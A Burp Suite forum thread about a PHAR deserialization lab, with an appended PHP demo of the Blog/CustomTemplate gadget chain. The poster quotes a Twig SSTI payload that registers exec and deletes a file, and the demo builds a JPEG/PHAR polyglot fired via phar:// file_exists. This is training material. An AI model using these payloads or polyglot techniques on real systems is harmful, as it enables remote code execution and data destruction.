Burp Suite User Forum


Why Do I need the CustomTemplate class to solve PHAR deserialization lab?

Guillaume | Last updated: Nov 13, 2023 04:23PM UTC

To solve the lab, I need to upload a polyglot JPG with malicious code inside. To do this, I used this tool: https://github.com/kunte0/phar-jpg-polyglot

Then, once the phar JPG file is uploaded on the server, I need to call it through the phar:// stream. It is trivial to find the right path.

NB: If I add a %00 on the path, the server returns an error and indicates the usage of file_exists, so if my understanding is correct, it means all serialized objects inside the JPG file will be deserialized.

Then, it is possible to download the source code inside the cgi-bin folder. I see that the class Blog has the magic method __wakeup with an SSTI vulnerability inside. So, if I serialize the following code inside my JPG file thanks to the phar-jpg-polyglot project:

    class Blog {}
    $object = new Blog();
    $object->user = 'carlos';
    $object->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}';

It is supposed to work, no? But it is not the case, and I need to use the class CustomTemplate, and I don't understand why.

Michelle, PortSwigger Agent | Last updated: Nov 14, 2023 10:33AM UTC

Hi, have you tried following along with the Community solution video? This goes into a bit more detail on the steps, so it might help you piece together the bits of information and understand why certain steps are needed.

Guillaume | Last updated: Nov 14, 2023 07:28PM UTC

Yes, I read the solution and watched the related videos, and I don't understand the explanation concerning the usage of the class CustomTemplate. I don't understand why I cannot use the Blog class alone. With the __wakeup method, if I serialize a Blog object inside the JPG phar file and use the phar:// stream on the image, because the avatar web page uses file_exists, the Blog object should be deserialized and the SSTI executed, but it is not the case.

Michelle, PortSwigger Agent | Last updated: Nov 15, 2023 03:39PM UTC

Hi, thanks for the update. We'll have a chat with the team and get back to you shortly.

Michelle, PortSwigger Agent | Last updated: Nov 17, 2023 01:36PM UTC

Hi, I've had a quick look at this lab with the team. In step 2, "In Burp Repeater, request GET /cgi-bin to find an index that shows a Blog.php and CustomTemplate.php file. Obtain the source code by requesting the files using the .php~ backup extension", we find that the files referenced, and so the classes declared within them, already exist and are referenced on the server. Using this information you can infer how the blog is set up and look into swapping out some of the classes with your own. There are a few other labs, such as 'Arbitrary object injection in PHP' (https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php), that also use a similar setup, so if you've not already worked through the other labs this may help deepen your understanding.

Guillaume | Last updated: Nov 17, 2023 03:42PM UTC

I downloaded the source code and I don't have any problem with this. My problem is that I don't understand why I need the CustomTemplate object to initiate the gadget chain. If I serialize the following code inside my JPG file thanks to the phar-jpg-polyglot project:

    class Blog {}
    $object = new Blog();
    $object->user = 'carlos';
    $object->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}';

It is supposed to work, no? But it is not the case, and I need to use the class CustomTemplate, and I don't understand why.

Michelle, PortSwigger Agent | Last updated: Nov 20, 2023 10:25AM UTC

Hi, I'm afraid we can't provide dedicated mentoring for individual labs. This is one of the expert-level labs, so it is designed to require more investigation to find the solution. Web applications work in arbitrary ways, and with this lab we're trying to provide more of a challenge around working out what's happening within the application and why, to then in turn figure out how it can be exploited.

Guillaume | Last updated: Nov 20, 2023 10:04PM UTC

Thanks to the last post here: https://forum.portswigger.net/thread/lab-using-phar-deserialization-to-deploy-a-custom-gadget-chain-8153534f I think I understand how the gadget chain works.

My mistake is that I thought the __wakeup function executed the SSTI payload, but the SSTI vulnerability is located inside the __toString function. The __wakeup function only initializes the index for rendering with Twig. So, I presume that the payload works like this:

1) When the CustomTemplate $object is deserialized, because it includes a Blog object, the __wakeup function is called and index == SSTI payload.

2) Then, the $object will be destroyed and the function lockFilePath() will be called.

3) Inside the lockFilePath() function we have:

    return 'templates/' . $this->template_file_path . '.lock';

$this->template_file_path is a Blog object and here it is treated like a string, so __toString will be called and the SSTI payload will be executed.
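The chain described in the post above, as an added, runnable PHP example that is not the lab's source and not any poster's payload. The Blog and CustomTemplate class bodies are a cut-down reconstruction built from what the thread says (names Blog, CustomTemplate, desc, template_file_path, lockFilePath come from the posts; the constructor, property visibility and the FakeTwig stub standing in for Twig are assumptions), the file names chain.phar, chain.jpg and explicit.phar and the placeholder desc string are constructed for the demo, and Part 2 goes beyond the thread by also showing the PHP 8 behaviour of the phar:// sink. Requires PHP 7.1+ and `php -d phar.readonly=0 phar_chain.php`.

```php
<?php
// Added example, not the lab's code. Run with: php -d phar.readonly=0 phar_chain.php
if (ini_get('phar.readonly')) {
    fwrite(STDERR, "run with: php -d phar.readonly=0 phar_chain.php\n");
    exit(1);
}

class FakeTwig {
    // Stand-in for the Twig environment (assumption): records what reached it.
    public static $wokeUp = false;
    public static $rendered = [];
    public static function reset(): void { self::$wokeUp = false; self::$rendered = []; }
    public function render(string $template): string {
        self::$rendered[] = $template;
        return 'rendered:' . $template;
    }
}

class Blog {
    public $user;
    public $desc;
    private $twig;
    public function __construct() { $this->twig = new FakeTwig(); }
    public function __wakeup(): void {
        // Runs inside unserialize(): only sets up the renderer. The template
        // text in $desc is NOT evaluated here.
        FakeTwig::$wokeUp = true;
        $this->twig = new FakeTwig();
    }
    public function __toString(): string {
        // Runs only when the object is used as a string; this is where an SSTI
        // payload in $desc would reach Twig.
        return $this->twig->render((string) $this->desc);
    }
}

class CustomTemplate {
    public $template_file_path;
    public $lock_file_path;
    public function __destruct() {
        // Runs when the last reference to the object goes away.
        $this->lock_file_path = $this->lockFilePath();
    }
    private function lockFilePath(): string {
        // Concatenation puts template_file_path in string context, which calls
        // Blog::__toString() when a Blog object was planted there.
        return 'templates/' . $this->template_file_path . '.lock';
    }
}

function makePayload(bool $wrapInCustomTemplate): object {
    $blog = new Blog();
    $blog->user = 'carlos';
    $blog->desc = '{{ twig payload goes here }}';   // constructed placeholder
    if (!$wrapInCustomTemplate) { return $blog; }
    $tpl = new CustomTemplate();
    $tpl->template_file_path = $blog;
    return $tpl;
}

// Part 1: plain unserialize() with unset(), so the destructor runs at a known
// point. Shows why a bare Blog wakes up but never renders anything.
function unserializeAndRelease(string $serialized): array {
    FakeTwig::reset();
    $obj = unserialize($serialized);
    unset($obj);
    return ['wakeup' => FakeTwig::$wokeUp, 'rendered' => FakeTwig::$rendered];
}

// Part 2: the same payload as PHAR metadata behind a JPEG-looking stub.
function buildPolyglot(string $pharName, string $jpgName, object $payload): void {
    foreach ([$pharName, $jpgName] as $f) { if (file_exists($f)) { unlink($f); } }
    $phar = new Phar($pharName);              // creation needs a .phar name
    $phar->startBuffering();
    $phar->addFromString('x.txt', 'x');
    // JPEG SOI/APP0 markers before the stub; a full JPEG body in front of
    // __HALT_COMPILER() (what phar-jpg-polyglot builds) works the same way.
    $phar->setStub("\xff\xd8\xff\xe0" . '<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata($payload);
    $phar->stopBuffering();
    unset($phar);
    // A new path is not in the phar cache, so the metadata is parsed from disk
    // exactly as on the lab server after the upload.
    rename($pharName, $jpgName);
}

function triggerViaStream(string $jpgName): array {
    FakeTwig::reset();
    // PHP 7: any phar:// stream operation (file_exists, is_file, ...) unserializes
    // the metadata. PHP 8.0+ no longer does, so the lab's sink would stay silent.
    file_exists("phar://$jpgName/x.txt");
    $result = ['file_exists' => FakeTwig::$wokeUp];

    FakeTwig::reset();
    // On PHP 8.0+ only an explicit Phar::getMetadata() unserializes it; the Phar
    // object itself needs a .phar name, hence the copy.
    if (file_exists('explicit.phar')) { unlink('explicit.phar'); }
    copy($jpgName, 'explicit.phar');
    (new Phar('explicit.phar'))->getMetadata();
    $result['getMetadata'] = FakeTwig::$wokeUp;
    return $result;
}

print_r(unserializeAndRelease(serialize(makePayload(false))));
print_r(unserializeAndRelease(serialize(makePayload(true))));
buildPolyglot('chain.phar', 'chain.jpg', makePayload(true));
print_r(['php' => PHP_VERSION] + triggerViaStream('chain.jpg'));
```

Part 1 prints wakeup true with an empty rendered list for the bare Blog, and the placeholder in rendered for the CustomTemplate wrapper, which is the distinction the thread turns on. Part 2 shows file_exists true on PHP 7.x and false on PHP 8.x, where only getMetadata is true; when the object is released by the phar archive rather than by unset(), the destructor still runs within the request, just later.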
